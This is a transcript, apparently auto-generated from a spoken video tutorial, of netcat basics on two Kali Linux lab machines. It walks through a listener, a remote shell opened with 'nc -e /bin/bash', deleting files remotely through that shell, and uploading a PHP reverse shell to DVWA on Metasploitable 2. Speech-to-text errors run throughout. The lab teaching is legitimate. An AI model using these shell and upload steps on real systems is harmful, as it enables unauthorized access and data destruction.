This video is the demonstration of the tool netcat. So you can enter man in C to view the manual of the tool netcat. It is just a simple Unix utility which reads and writes data across network connection using TCP or UDP protocol. Instead of reading this theory, we are going for practicals. So you can read this if you are interested. So in this video, I'll show some basic usage of netcat tool. Okay. So for this demonstration purpose, I'm using two Kali Linux, one in VMware and one in VirtualBox. Okay. So when I enter if config on my first machine, this is my first Kali Linux which is in VMware. So this is my second Kali Linux which is in VirtualBox. Okay. So when I enter if config, I get the IP of this device, right? Same, you can enter if config on the second device to get the IP address. Okay, so this is the IP address. So let's use netcat. First, I'm gonna start a listen in my first machine. I'm using the command netcat nc for netcat and minus nvlp minus n. The n stands for the numeric and v stands for the verbose, and the L stands for the listen and P stands for the port. So we use minus NVLP and the port number which is 4444. Okay, I'm just entering it. It shows it's listening, right? You can see it's listening on 4444. Okay, so in my second machine, I'm using the command NC for netcat and the IP address which is my first device IP address. So I'm just copying that IP address and pasting on my this machine, and IP space port. When I enter NC for netcat and the IP of my target, this is my target machine. So and this is the port. So this is the machine that we want to connect. So that is why I entered this IP address of the machine that you want to connect and the port number. So this is the port. It is this machine is listening to this port, and let's enter. As you can see, you are now connected. So when you enter any command like anything, like when you enter anything in here, you can see it here. When you enter anything like here, you can see it here. So whatever you enter in any of the machine, you can see it in the opposite machine, as you can see. So this is how you use netcat for basic purpose. Like let's quit this and I will show one more example. Like I'm clearing the window of both of my machines. So I'm opening a new tab for finding the IP address, and here a new tab for the IP address. Okay, now I'm starting the listening in this machine. Okay, I'm using, so let me use the first time. I'm using netcat and minus n for the numeric, verbose, listen, port, and the port number I am specifying 1234 port. Okay, so if I want to connect to this device, so I need to enter the command here, like I need to enter the command netcat. NC stands for netcat, and the device IP address of the device that I want to connect. So this is the IP address. So I'm going to copy in the device IP address that I want to connect, and the port number which is 1234, right? So I'm pressing enter. As you can see, we were able to connect. And you enter any command here or here, it will display in the opposite machine. Okay, as you can see here. So but in this type of connection, what we enter is NC and the IP and the port number. So what we enter in first or second machine will be shown in both machines is what is there. So we have another way to access the files of a machine. Like if you want to access the contents of one machine, like I'm entering the command netcat and /bin/bad. You can enter netcat and minus -e and /bin/bash and the IP address of the device that you want to connect, which is I want to connect to this IP. So I'm pasting this, and the port number you can specify any port number. I'm specifying 1234 as the port number. So I have to listen to this port before entering this command. So I'm starting this listen like netcat minus nvlp, and the listen is 1234 is the port. started the listening. So I'm entering the command again. So here I connected, right? So when I enter ls, as you can see, so I am opening another tab and enter ls. So these are the contents available here, right? 1, 2, like wiremon and the desktop and the contents. So I'm able to see the contents of this machine, the first machine, in my second listen machine. As you can see, I can enter the command like rm minus rf and the first file name, the directory name, and press enter. So what will happen here is, like as you can see, when I enter ls before, you can see this. When I enter again ls, you can see this is removed by entering the command in the second machine. So when you use the shell like -e and the bin bash, then we can access the content of another machine and we can do whatever we want on that another machine. As you can see, this is the comment for that. I hope you understand. If you have any doubts, then let me know in the comment sections below. Okay, so you can enter the comment like nc -add to view some of the flags. So as you can see, so let me show you one more thing. Okay, like let me clear this and nc -it. Yeah, you are able to see clearly, properly. As you can see, it's dangerous when you use the command bin sh or bin bash. It's dangerous, right? We are able to read the contents, right? We can do anything we want, right? So that is why it shows dangerous. So you can use any of the flags and try it yourself. So the another usage of netcat command is just, I'm just closing all the window. Like we can use a reverse shell and get access. For that, I am copying the reverse shell which is located in my or any of the Linux machine has reverse shells by default, which is located in user share web shells PHP. It has PHP reverse shell or PHP new machine. You can enter this command to copy the reverse shell in your machine to any of the directories. So here I am copying this to home Kali. So when I enter ls, you can see the file here. So I am opening another tab and enter the command ifconfig to know my IP address, which is, this is our IP address, which we can call as lhost, which is a local host. So we can open this PHP reverse shell and we can edit the file and change the IP to our IP address and save the file. So in doing missions like ethical hacking or any other hacking or cracking or CTO flags or missions, so you can upload a reverse shell into that mission and get access to that particular mission using the netcat command. So here in the demonstration, I'm using DVWA, which is the damn vulnerable web application. So you can use DVWA in TryHackMe or any other platform. Like you can download a mission like Metasploitable 2, which has DVWA. So like here I'm using this meta 2, which is Metasploitable 2, which I downloaded, and I'm opening the DVWA vulnerability in Metasploitable 2, and I'm putting the security of DVWA to low, and I'm uploading a file. Like this is the file that we want to upload. So I am clicking the upload button. As you can see, I'm able to upload the file into this directory, which is in hackable uploads. So I'm just copying this directory. So I'm just moving to that directory. Now I can see this is the file that I uploaded right now. So in my terminal, like you can see this is my terminal. So I can enter the command nc for netcat and -nvlp numeric verbose listen port and the port number 1234. So we know that our reverse shell, let me close this and I'm opening the reverse shell so that we are like, this is the reverse shell that we put it into this mission, like this DVW vulnerability into the upload directory, that we uploaded our reverse shell into this directory, right? So in the reverse shell, as you can see, this is the IP address of the mission that we are going to listen, and this is the port number. The port number is 1234, right? So we want to start the listen in port 1234. So that is why I'm entering the command netcat minus nvlp and the port 1234. I start on the listen, right? The listen was now start. Like I'm gonna click here to execute it. Okay, so let me click here. So I clicked. As you can see, it's working. So when I open the terminal, as you can see, I got access. Like whenever I click and this reverse shell executed in this mission or in this website, so I got access to that website, right? When I enter ls, I can view the contents of that particular website. So this is how you use netcat. Like you can upload into a vulnerable mission and get access to your mission using the command netcat. So these are the main usages of netcat. So I hope you enjoyed this video. If you have any doubts, comment down below, guys, and thanks for watching, guys. Have a nice day.